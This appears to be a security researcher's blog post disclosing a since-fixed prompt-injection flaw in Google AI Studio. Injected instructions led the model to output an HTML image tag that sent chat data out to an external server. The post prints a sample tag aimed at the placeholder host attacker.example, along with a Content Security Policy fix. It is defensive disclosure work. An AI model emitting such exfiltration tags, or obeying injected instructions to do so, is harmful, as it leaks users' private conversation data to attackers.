Google AI Studio: LLM-Powered Data Exfiltration Hits Again! Quickly Fixed.
Recently, I found what appeared to be a regression or bypass that once again allowed data exfiltration via image rendering during prompt injection. See the previous post here for reference.
Data Exfiltration via Rendering HTML Image Tags

During re-testing, I had sporadic success with markdown rendering tricks, but eventually I was able to drastically simplify the exploit by asking directly for an HTML image tag.
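To illustrate the pattern (the domain and query string below are placeholders, not the actual payload used), the injected instructions only need to convince the model to emit a tag along these lines. As soon as the UI renders it, the browser fetches the "image" and hands the data to the attacker's server via the URL:

```html
<!-- Hypothetical example: attacker.example stands in for an
     attacker-controlled server, and the query string carries
     whatever chat data the injected prompt told the model to append. -->
<img src="https://attacker.example/log?data=EXFILTRATED_CHAT_DATA" width="1" height="1">
```

No user interaction is required; rendering the tag is enough to trigger the outbound request.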
This behavior might actually have existed all along: Google AI Studio hadn't yet implemented any kind of Content Security Policy, so rendered images could load from, and thus communicate with, arbitrary domains.
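A minimal sketch of the kind of policy that would close this channel (the directive shown is illustrative, not Google's actual fix, and a real deployment would typically ship it as an HTTP response header rather than a meta tag):

```html
<!-- Hypothetical policy: only allow images from the page's own origin,
     so an <img> pointing at an arbitrary external domain is blocked. -->
<meta http-equiv="Content-Security-Policy" content="img-src 'self'">
```

With img-src locked down like this, the browser refuses to fetch images from attacker-controlled hosts, so the exfiltration vector stops working even if the model emits the tag.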